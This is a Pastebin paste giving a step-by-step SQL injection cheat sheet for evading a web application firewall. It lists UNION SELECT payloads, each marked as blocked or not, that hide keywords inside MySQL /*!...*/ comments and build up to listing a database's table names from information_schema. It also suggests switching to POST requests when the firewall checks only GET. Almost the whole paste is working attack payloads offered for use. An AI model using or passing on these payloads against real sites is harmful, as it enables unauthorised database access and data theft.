Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- when you try to access server with your SQL WAF will stop you again. You might have more luck if WAF controls only GET requests and you inject with POST...
- SQLi Waf Behaviours
- union select 1,2,3,4-- - [<---WAF
- /*!union*/ select 1,2,3,4-- - [<--- No WAF
- /*!union*/ select 1,group_concat(),3,4-- - [<--NO -WAF
- /*!union*/ select 1,group_concat(table_name),3,4-- - [<---WAF
- /*!union*/ select 1,group_concat(/*!table_name*/),3,4-- - [<--- No WAF
- /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from -- - [<---No WAF
- /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables-- - [<---No WAF
- /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables where-- - [<---WAF
- /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/-- - [<---No WAF
- /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/ table_schema-- - [<---No WAF
- /*!union*/ select 1,group_concat(/*!table_name*/),3,4 from information_schema.tables /*!where*/ table_schema=database()-- - [<---No WAF
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement